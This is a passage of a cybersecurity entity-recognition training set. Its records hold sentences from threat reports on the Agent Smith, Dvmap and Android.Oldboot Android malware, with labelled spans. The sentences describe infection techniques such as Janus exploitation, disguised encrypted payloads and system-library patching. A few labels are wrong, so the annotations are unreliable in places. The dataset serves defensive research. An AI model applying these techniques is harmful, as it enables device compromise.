target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update .", "spans": {}, "info": {"id": "cyner_train_001794", "source": "cyner_train"}} {"text": "“ Agent Smith ” repacks its prey apps at 
smali/baksmali code level .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001795", "source": "cyner_train"}} {"text": "In certain situations , variants intercept compromised apps ’ original legitimate ads display events and report back to the intended ad-exchange with the “ Agent Smith ” campaign hacker ’ s ad IDs .", "spans": {"MALWARE: Agent Smith": [[156, 167]]}, "info": {"id": "cyner_train_001798", "source": "cyner_train"}} {"text": "Our intelligence shows “ Agent Smith ” droppers proliferate through third-party app store “ 9Apps ” , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users .", "spans": {"MALWARE: Agent Smith": [[25, 36]], "SYSTEM: 9Apps": [[92, 97]]}, "info": {"id": "cyner_train_001799", "source": "cyner_train"}} {"text": "“ Agent Smith ” itself , though , seems to target mainly India users .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001800", "source": "cyner_train"}} {"text": "Technical Analysis “ Agent Smith ” has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper .", "spans": {"MALWARE: Agent Smith": [[21, 32]]}, "info": {"id": "cyner_train_001802", "source": "cyner_train"}} {"text": "The dropper is a repacked legitimate application which contains an additional piece of code – “ loader ” .", "spans": {}, "info": {"id": "cyner_train_001803", "source": "cyner_train"}} {"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the “ boot ” module into the repacked application .", "spans": {"VULNERABILITY: Janus": [[62, 67]]}, "info": {"id": "cyner_train_001806", "source": "cyner_train"}} {"text": "After the next run of the infected application , the “ boot ” module will run the “ patch ” module , which hooks the methods from known ad SDKs to its own implementation .", "spans": {}, "info": 
{"id": "cyner_train_001807", "source": "cyner_train"}} {"text": "Figure 1 : ‘ Agent Smith ’ s modular structure Technical Analysis – Loader Module The “ loader ” module , as stated above , extracts and runs the “ core ” module .", "spans": {"MALWARE: Agent Smith": [[13, 24]]}, "info": {"id": "cyner_train_001808", "source": "cyner_train"}} {"text": "While the “ core ” module resides inside the APK file , it is encrypted and disguised as a JPG file – the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher .", "spans": {}, "info": {"id": "cyner_train_001809", "source": "cyner_train"}} {"text": "Figure 2 : “ Agent Smith ’ s jpg file structure After the extraction , the “ loader ” module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "SYSTEM: Android": [[166, 173]]}, "info": {"id": "cyner_train_001810", "source": "cyner_train"}} {"text": "Figure 3 : Loading core malicious code into the benign application Once the “ core ” module is extracted and loaded , the “ loader ” uses the reflection technique to initialize and start the “ core ” module .", "spans": {}, "info": {"id": "cyner_train_001811", "source": "cyner_train"}} {"text": "Figure 4 : Loader calls initialization method Technical Analysis – Core Module With the main purpose of spreading the infection , “ Agent Smith ” implements in the “ core ” module : A series of ‘ Bundle ’ vulnerabilities , which is used to install applications without the victim ’ s awareness .", "spans": {"MALWARE: Agent Smith": [[132, 143]], "VULNERABILITY: Bundle": [[196, 202]]}, "info": {"id": "cyner_train_001812", "source": "cyner_train"}} {"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version .", "spans": {"VULNERABILITY: Janus": [[4, 9]]}, "info": {"id": "cyner_train_001813", "source": "cyner_train"}} {"text": 
"The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender", "spans": {"SYSTEM: whatsapp": [[151, 159]]}, "info": {"id": "cyner_train_001814", "source": "cyner_train"}} {"text": "eterno truecaller For each application on the list , the “ core ” module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space .", "spans": {}, "info": {"id": "cyner_train_001815", "source": "cyner_train"}} {"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it .", "spans": {"SYSTEM: Android": [[47, 54]]}, "info": {"id": "cyner_train_001818", "source": "cyner_train"}} {"text": "Therefore , “ Agent Smith ” decompiles both the original application and the malicious payload and fuses them together .", "spans": {"MALWARE: Agent Smith": [[14, 25]]}, "info": {"id": "cyner_train_001819", "source": "cyner_train"}} {"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , “ Agent Smith ” has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with ‘ AdMob ’ , ‘ Facebook ’ , ‘ MoPub ’ and ‘ Unity Ads ’ .", "spans": {"MALWARE: Agent Smith": [[116, 127]], "SYSTEM: AdMob": [[324, 329]], "SYSTEM: Facebook": [[336, 344]], "SYSTEM: MoPub": [[351, 356]], "SYSTEM: Unity Ads": [[365, 374]]}, "info": {"id": "cyner_train_001820", "source": "cyner_train"}} {"text": "Figure 6 : Targeted ad network Figure 7 : Injection example 
After all of the required changes , “ Agent Smith ” compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload .", "spans": {"MALWARE: Agent Smith": [[98, 109]]}, "info": {"id": "cyner_train_001821", "source": "cyner_train"}} {"text": "In some cases , the decompilation process will fail , and “ Agent Smith ” will try another method for infecting the original application – A binary patch , which simply provides a binary file of the “ boot ” module of “ Agent Smith ” .", "spans": {"MALWARE: Agent Smith": [[60, 71], [220, 231]]}, "info": {"id": "cyner_train_001822", "source": "cyner_train"}} {"text": "Once the payload is prepared , “ Agent Smith ” uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough .", "spans": {"MALWARE: Agent Smith": [[33, 44]], "VULNERABILITY: Janus": [[98, 103]]}, "info": {"id": "cyner_train_001823", "source": "cyner_train"}} {"text": "This means that the only thing possible in this case is to replace its DEX file .", "spans": {}, "info": {"id": "cyner_train_001825", "source": "cyner_train"}} {"text": "To overcome this issue , “ Agent Smith ” found another solution .", "spans": {"MALWARE: Agent Smith": [[27, 38]]}, "info": {"id": "cyner_train_001826", "source": "cyner_train"}} {"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process .", "spans": {}, "info": {"id": "cyner_train_001828", "source": "cyner_train"}} {"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android ’ s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file .", 
"spans": {"SYSTEM: Android": [[126, 133]]}, "info": {"id": "cyner_train_001829", "source": "cyner_train"}} {"text": "Even now , this is still not enough .", "spans": {}, "info": {"id": "cyner_train_001830", "source": "cyner_train"}} {"text": "“ Agent Smith ” needs to be updated/installed without the user ’ s consent .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001831", "source": "cyner_train"}} {"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application .", "spans": {}, "info": {"id": "cyner_train_001833", "source": "cyner_train"}} {"text": "The system service ‘ AccountManagerService ’ looks for the application that can process this request .", "spans": {}, "info": {"id": "cyner_train_001834", "source": "cyner_train"}} {"text": "While doing so , it will reach a service exported by “ Agent Smith ” , and sends out an authentication request that would lead to a call to the ‘ addAccount ’ method .", "spans": {"MALWARE: Agent Smith": [[55, 66]]}, "info": {"id": "cyner_train_001835", "source": "cyner_train"}} {"text": "Figure 10 : The algorithm of the malicious update , while “ Agent Smith ” updates application If all that has failed , “ Agent Smith ” turns to Man-in-the-Disk vulnerability for ‘ SHAREit ’ or ‘ Xender ’ applications .", "spans": {"MALWARE: Agent Smith": [[60, 71], [121, 132]], "VULNERABILITY: Man-in-the-Disk": [[144, 159]], "SYSTEM: SHAREit": [[180, 187]], "SYSTEM: Xender": [[195, 201]]}, "info": {"id": "cyner_train_001837", "source": "cyner_train"}} {"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload .", "spans": {}, "info": {"id": "cyner_train_001838", "source": "cyner_train"}} {"text": "Figure 11 : ‘ Agent Smith ’ uses man-in-disk to install the malicious update Technical Analysis – Boot Module The “ boot ” module is 
basically another “ loader ” module , but this time it ’ s executed in the infected application .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "VULNERABILITY: man-in-disk": [[33, 44]]}, "info": {"id": "cyner_train_001839", "source": "cyner_train"}} {"text": "The infected application contains its payload inside the DEX file .", "spans": {}, "info": {"id": "cyner_train_001841", "source": "cyner_train"}} {"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset .", "spans": {}, "info": {"id": "cyner_train_001842", "source": "cyner_train"}} {"text": "While investing a lot of resources in the development of this malware , the actor behind “ Agent Smith ” does not want a real update to remove all of the changes made , so here is where the “ patch ” module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears .", "spans": {"MALWARE: Agent Smith": [[91, 102]]}, "info": {"id": "cyner_train_001847", "source": "cyner_train"}} {"text": "Another trick in “ Agent Smith ’ s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check .", "spans": {"MALWARE: Agent Smith": [[19, 30]]}, "info": {"id": "cyner_train_001848", "source": "cyner_train"}} {"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim .", "spans": {}, "info": {"id": "cyner_train_001849", "source": "cyner_train"}} {"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ .", "spans": {}, "info": {"id": "cyner_train_001850", "source": "cyner_train"}} {"text": "“ Agent Smith ” will replace the original 
application ’ s activities with an in-house SDK ’ s activity , which will show the banner received from the server .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001852", "source": "cyner_train"}} {"text": "Among multiple sub-domains , “ ad.a * * * d.org ” and “ gd.a * * * d.org ” both historically resolved to the same suspicious IP address .", "spans": {}, "info": {"id": "cyner_train_001856", "source": "cyner_train"}} {"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape “ Agent Smith ” droppers show a very greedy infection tactic .", "spans": {"MALWARE: Agent Smith": [[67, 78]]}, "info": {"id": "cyner_train_001862", "source": "cyner_train"}} {"text": "It ’ s not enough for this malware family to swap just one innocent application with an infected double .", "spans": {}, "info": {"id": "cyner_train_001863", "source": "cyner_train"}} {"text": "It does so for each and every app on the device as long as the package names are on its prey list .", "spans": {}, "info": {"id": "cyner_train_001864", "source": "cyner_train"}} {"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches .", "spans": {}, "info": {"id": "cyner_train_001865", "source": "cyner_train"}} {"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications .", "spans": {}, "info": {"id": "cyner_train_001866", "source": "cyner_train"}} {"text": "As an initial attack vector , “ Agent Smith ” abuses the 9Apps market – with over 360 different dropper variants .", "spans": {"MALWARE: Agent Smith": [[32, 43]], "SYSTEM: 9Apps": [[57, 62]]}, "info": {"id": "cyner_train_001867", "source": "cyner_train"}} {"text": "To maximize profit , variants with “ MinSDK ” or “ OTA ” SDK are present to further infect victims with other adware families .", 
"spans": {}, "info": {"id": "cyner_train_001868", "source": "cyner_train"}} {"text": "The majority of droppers in 9Apps are games , while the rest fall into categories of adult entertainment , media player , photo utilities , and system utilities .", "spans": {"SYSTEM: 9Apps": [[28, 33]]}, "info": {"id": "cyner_train_001869", "source": "cyner_train"}} {"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The “ Agent Smith ” campaign is primarily targeted at Indian users , who represent 59 % of the impacted population .", "spans": {"MALWARE: Agent Smith": [[281, 292]]}, "info": {"id": "cyner_train_001870", "source": "cyner_train"}} {"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , “ Agent Smith ” has a significant impact upon not only developing countries but also some developed countries where GP is readily available .", "spans": {"SYSTEM: Google Play": [[32, 43]], "MALWARE: Agent Smith": [[76, 87]]}, "info": {"id": "cyner_train_001871", "source": "cyner_train"}} {"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by “ Agent Smith ” , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions .", "spans": {"MALWARE: Agent Smith": [[100, 111]], "SYSTEM: Android": [[217, 224], [411, 418]], "SYSTEM: Android 5 and 6": [[323, 338]]}, "info": {"id": "cyner_train_001873", "source": "cyner_train"}} {"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 .", "spans": 
{"VULNERABILITY: Janus": [[17, 22]]}, "info": {"id": "cyner_train_001875", "source": "cyner_train"}} {"text": "However , in order to block Janus abuse , app developers need to sign their apps with the new scheme so that Android framework security component could conduct integrity checks with enhanced features .", "spans": {"VULNERABILITY: Janus": [[28, 33]], "SYSTEM: Android": [[109, 116]]}, "info": {"id": "cyner_train_001876", "source": "cyner_train"}} {"text": "Figure 25 : infected Android version distribution To further analyze “ Agent Smith ” ’ s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Agent Smith": [[71, 82]]}, "info": {"id": "cyner_train_001877", "source": "cyner_train"}} {"text": "App Swap Per Device Avg .", "spans": {}, "info": {"id": "cyner_train_001878", "source": "cyner_train"}} {"text": "Months Device Remained Infected India 15,230,123 2,017,873,249 2.6 1.7 2.1 Bangladesh 2,539,913 208,026,886 2.4 1.5 2.2 Pakistan 1,686,216 94,296,907 2.4 1.6 2 Indonesia 572,025 67,685,983 2 1.5 2.2 Nepal 469,274 44,961,341 2.4 1.6 2.4 US 302,852 19,327,093 1.7 1.4 1.8 Nigeria 287,167 21,278,498 2.4 1.3 2.3 Hungary 282,826 7,856,064 1.7 1.3 1.7 Saudi Arabia 245,698 18,616,259 2.3", "spans": {}, "info": {"id": "cyner_train_001880", "source": "cyner_train"}} {"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 “ Agent Smith ” Timeline Early signs of activity from the actor behind “ Agent Smith ” can be traced back to January 2016 .", "spans": {"MALWARE: Agent Smith": [[48, 59]]}, "info": {"id": "cyner_train_001881", "source": "cyner_train"}} {"text": "We classify this 40-month period into three main stages .", "spans": {}, "info": {"id": "cyner_train_001882", "source": "cyner_train"}} {"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up 
windows .", "spans": {"SYSTEM: windows": [[136, 143]]}, "info": {"id": "cyner_train_001884", "source": "cyner_train"}} {"text": "However , samples don ’ t have key capabilities to infect innocent apps on victim devices yet .", "spans": {}, "info": {"id": "cyner_train_001886", "source": "cyner_train"}} {"text": "May 2018 to April 2019 : This is the actual mature stage of “ Agent Smith ” campaign .", "spans": {"MALWARE: Agent Smith": [[62, 73]]}, "info": {"id": "cyner_train_001887", "source": "cyner_train"}} {"text": "From early 2018 prior to May , “ Agent Smith ” hackers started to experiment with Bundle Feng Shui , the key tool which gives “ Agent Smith ” malware family capabilities to infect innocent apps on the device .", "spans": {"MALWARE: Agent Smith": [[33, 44], [128, 139]]}, "info": {"id": "cyner_train_001888", "source": "cyner_train"}} {"text": "A series of pilot runs were executed .", "spans": {}, "info": {"id": "cyner_train_001889", "source": "cyner_train"}} {"text": "Its dropper family finished integration with Bundle Feng Shui and campaign C & C infrastructure was shifted to AWS cloud .", "spans": {"SYSTEM: AWS": [[111, 114]]}, "info": {"id": "cyner_train_001891", "source": "cyner_train"}} {"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of “ Agent Smith ” dropped significantly .", "spans": {"MALWARE: Agent Smith": [[73, 84]]}, "info": {"id": "cyner_train_001893", "source": "cyner_train"}} {"text": "From early April , hackers started to build a new major update to the “ Agent Smith ” campaign under the name “ leechsdk ” .", "spans": {"MALWARE: Agent Smith": [[72, 83]]}, "info": {"id": "cyner_train_001894", "source": "cyner_train"}} {"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests .", "spans": {}, "info": {"id": "cyner_train_001896", "source": "cyner_train"}} {"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a 
malicious yet dormant SDK related to “ Agent Smith ” actor .", "spans": {"SYSTEM: Google Play store": [[65, 82]], "MALWARE: Agent Smith": [[137, 148]]}, "info": {"id": "cyner_train_001897", "source": "cyner_train"}} {"text": "Instead of embedding core malware payload in droppers , the actor switches to a more low-key SDK approach .", "spans": {}, "info": {"id": "cyner_train_001899", "source": "cyner_train"}} {"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch .", "spans": {}, "info": {"id": "cyner_train_001902", "source": "cyner_train"}} {"text": "The below code snippet is currently isolated and dormant .", "spans": {}, "info": {"id": "cyner_train_001903", "source": "cyner_train"}} {"text": "In the future , it will be invoked by malicious SDK during banner ads display .", "spans": {}, "info": {"id": "cyner_train_001904", "source": "cyner_train"}} {"text": "Check Point Research reported these dangerous apps to Google upon discovery .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[54, 60]]}, "info": {"id": "cyner_train_001907", "source": "cyner_train"}} {"text": "Interestingly , we uncovered several expired job posting of Android reverse engineer from the actor ’ s front business published in 2018 and 2019 .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_001911", "source": "cyner_train"}} {"text": "It seems that the people who filled these roles are key to “ Agent Smith ’ s success , yet not quite necessary for actor ’ s legitimate side of business .", "spans": {"MALWARE: Agent Smith": [[61, 72]]}, "info": {"id": "cyner_train_001912", "source": "cyner_train"}} {"text": "With a better understanding of the “ Agent Smith ” actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor ’ s unusual practices in choosing targets .", "spans": {"MALWARE: Agent Smith": [[37, 48]]}, "info": {"id": "cyner_train_001913", 
"source": "cyner_train"}} {"text": "It seems , “ Agent Smith ” prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor ’ s legitimate business arm to suppress competition .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "VULNERABILITY: Janus": [[68, 73]]}, "info": {"id": "cyner_train_001914", "source": "cyner_train"}} {"text": "Conclusion Although the actor behind “ Agent Smith ” decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route .", "spans": {"MALWARE: Agent Smith": [[39, 50]]}, "info": {"id": "cyner_train_001915", "source": "cyner_train"}} {"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user ’ s digital even physical security .", "spans": {}, "info": {"id": "cyner_train_001916", "source": "cyner_train"}} {"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more .", "spans": {}, "info": {"id": "cyner_train_001917", "source": "cyner_train"}} {"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time .", "spans": {}, "info": {"id": "cyner_train_001919", "source": "cyner_train"}} {"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store .", "spans": {"MALWARE: Dvmap": [[0, 5]], "SYSTEM: Android": [[18, 25]], "SYSTEM: Google Play Store": [[151, 168]]}, "info": {"id": "cyner_train_001921", "source": "cyner_train"}} {"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 
13]]}, "info": {"id": "cyner_train_001923", "source": "cyner_train"}} {"text": "The distribution of rooting malware through Google Play is not a new thing .", "spans": {"SYSTEM: Google Play": [[44, 55]]}, "info": {"id": "cyner_train_001924", "source": "cyner_train"}} {"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 .", "spans": {"MALWARE: Ztorg Trojan": [[18, 30]], "SYSTEM: Google Play": [[52, 63]]}, "info": {"id": "cyner_train_001925", "source": "cyner_train"}} {"text": "But Dvmap is very special rooting malware .", "spans": {"MALWARE: Dvmap": [[4, 9]]}, "info": {"id": "cyner_train_001926", "source": "cyner_train"}} {"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries – libdmv.so or libandroid_runtime.so .", "spans": {}, "info": {"id": "cyner_train_001927", "source": "cyner_train"}} {"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times .", "spans": {"MALWARE: Dvmap": [[11, 16]], "SYSTEM: Android": [[27, 34]], "SYSTEM: Google Play Store": [[146, 163]]}, "info": {"id": "cyner_train_001928", "source": "cyner_train"}} {"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: Google": [[37, 43]]}, "info": {"id": "cyner_train_001929", "source": "cyner_train"}} {"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time .", "spans": {"SYSTEM: Google Play Store": [[10, 27]]}, "info": {"id": "cyner_train_001930", "source": "cyner_train"}} {"text": "Usually they would upload a clean 
version back on Google Play the very same day .", "spans": {"SYSTEM: Google Play": [[50, 61]]}, "info": {"id": "cyner_train_001931", "source": "cyner_train"}} {"text": "All the malicious Dvmap apps had the same functionality .", "spans": {"MALWARE: Dvmap": [[18, 23]]}, "info": {"id": "cyner_train_001933", "source": "cyner_train"}} {"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name “ start. ” The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare .", "spans": {"SYSTEM: Android": [[230, 237]]}, "info": {"id": "cyner_train_001934", "source": "cyner_train"}} {"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res – and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase .", "spans": {}, "info": {"id": "cyner_train_001935", "source": "cyner_train"}} {"text": "All archives from this phase contain the same files except for one called “ common ” .", "spans": {}, "info": {"id": "cyner_train_001937", "source": "cyner_train"}} {"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems .", "spans": {}, "info": {"id": "cyner_train_001938", "source": "cyner_train"}} {"text": "If these files successfully gain root rights , the Trojan will install several tools into the system .", "spans": {}, "info": {"id": "cyner_train_001939", "source": "cyner_train"}} {"text": "It will check the version of Android installed and decide which library should be patched .", "spans": {"SYSTEM: Android": [[29, 36]]}, "info": {"id": "cyner_train_001941", "source": "cyner_train"}} {"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and 
for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so .", "spans": {"SYSTEM: Android 4.4.4": [[4, 17]], "SYSTEM: Android": [[120, 127]]}, "info": {"id": "cyner_train_001942", "source": "cyner_train"}} {"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments .", "spans": {"SYSTEM: Dalvik": [[57, 63]], "SYSTEM: ART": [[68, 71]]}, "info": {"id": "cyner_train_001943", "source": "cyner_train"}} {"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } .", "spans": {}, "info": {"id": "cyner_train_001944", "source": "cyner_train"}} {"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip .", "spans": {}, "info": {"id": "cyner_train_001945", "source": "cyner_train"}} {"text": "This could be very dangerous and cause some devices to crash following the overwrite .", "spans": {}, "info": {"id": "cyner_train_001946", "source": "cyner_train"}} {"text": "Then the Trojan will put the patched library back into the system directory .", "spans": {}, "info": {"id": "cyner_train_001947", "source": "cyner_train"}} {"text": "This means that all apps that were using this file will lose some functionality or even start crashing .", "spans": {}, "info": {"id": "cyner_train_001951", "source": "cyner_train"}} {"text": "Malicious module “ ip ” This file will be executed by the patched system library .", "spans": {}, "info": {"id": "cyner_train_001952", "source": "cyner_train"}} {"text": "It can turn off “ VerifyApps ” and enable the installation of apps from 3rd party stores by changing system settings .", "spans": {}, "info": {"id": "cyner_train_001953", "source": "cyner_train"}} {"text": "It is a very unusual way to get Device Administrator rights .", "spans": {}, "info": {"id": "cyner_train_001955", "source": "cyner_train"}} {"text": "Malicious app com.qualcmm.timeservices 
As I mentioned before , in the “ initial phase ” , the Trojan will install the “ com.qualcmm.timeservices ” app .", "spans": {}, "info": {"id": "cyner_train_001956", "source": "cyner_train"}} {"text": "Its main purpose is to download archives and execute the “ start ” binary from them .", "spans": {}, "info": {"id": "cyner_train_001957", "source": "cyner_train"}} {"text": "During the investigation , this app was able to successfully connect to the command and control server , but it received no commands .", "spans": {}, "info": {"id": "cyner_train_001958", "source": "cyner_train"}} {"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries .", "spans": {"SYSTEM: Google Play Store": [[52, 69]]}, "info": {"id": "cyner_train_001960", "source": "cyner_train"}} {"text": "It installs malicious modules with different functionality into the system .", "spans": {}, "info": {"id": "cyner_train_001961", "source": "cyner_train"}} {"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights .", "spans": {}, "info": {"id": "cyner_train_001962", "source": "cyner_train"}} {"text": "But I never received such files from their command and control server .", "spans": {}, "info": {"id": "cyner_train_001963", "source": "cyner_train"}} {"text": "These malicious modules report to the attackers about every step they are going to make .", "spans": {}, "info": {"id": "cyner_train_001964", "source": "cyner_train"}} {"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices .", "spans": {}, "info": {"id": "cyner_train_001965", "source": "cyner_train"}} {"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods .", "spans": {}, 
"info": {"id": "cyner_train_001967", "source": "cyner_train"}} {"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user .", "spans": {"SYSTEM: Android": [[95, 102]], "SYSTEM: ANDROID": [[227, 234]], "SYSTEM: DROID": [[303, 308]]}, "info": {"id": "cyner_train_001968", "source": "cyner_train"}} {"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it .", "spans": {"ORGANIZATION: Web": [[32, 35]], "SYSTEM: Android": [[76, 83]]}, "info": {"id": "cyner_train_001969", "source": "cyner_train"}} {"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries .", "spans": {"MALWARE: Android.Oldboot": [[12, 27]], "SYSTEM: android": [[59, 66]]}, "info": {"id": "cyner_train_001970", "source": "cyner_train"}} {"text": "China seems to a mass victim of this kind of malware having a 92 % share .", "spans": {}, "info": {"id": "cyner_train_001971", "source": "cyner_train"}} {"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller .", "spans": {}, "info": {"id": "cyner_train_001972", "source": "cyner_train"}} {"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you 
switch on your android .", "spans": {"SYSTEM: Android": [[68, 75]], "SYSTEM: android": [[280, 287]]}, "info": {"id": "cyner_train_001973", "source": "cyner_train"}} {"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app .", "spans": {}, "info": {"id": "cyner_train_001974", "source": "cyner_train"}} {"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps .", "spans": {"MALWARE: Android.Oldboot": [[0, 15]]}, "info": {"id": "cyner_train_001975", "source": "cyner_train"}} {"text": "Since it becomes a part of the boot partition , formatting the device will not solve the problem .", "spans": {}, "info": {"id": "cyner_train_001976", "source": "cyner_train"}} {"text": "So , users should beware of certain modified Android firmware .", "spans": {"SYSTEM: Android": [[45, 52]]}, "info": {"id": "cyner_train_001978", "source": "cyner_train"}} {"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system .", "spans": {"SYSTEM: Android": [[41, 48]]}, "info": {"id": "cyner_train_001980", "source": "cyner_train"}} {"text": "The Android malware Android.Oldboot is almost impossible to remove , not even with formatting your device .", "spans": {"SYSTEM: Android": [[4, 11]], "MALWARE: Android.Oldboot": [[20, 35]]}, "info": {"id": "cyner_train_001982", "source": "cyner_train"}} {"text": "But if your device is not from a Chinese manufacturer , then chances that you are a victim of it , are very less .", "spans": {}, "info": {"id": "cyner_train_001983", 
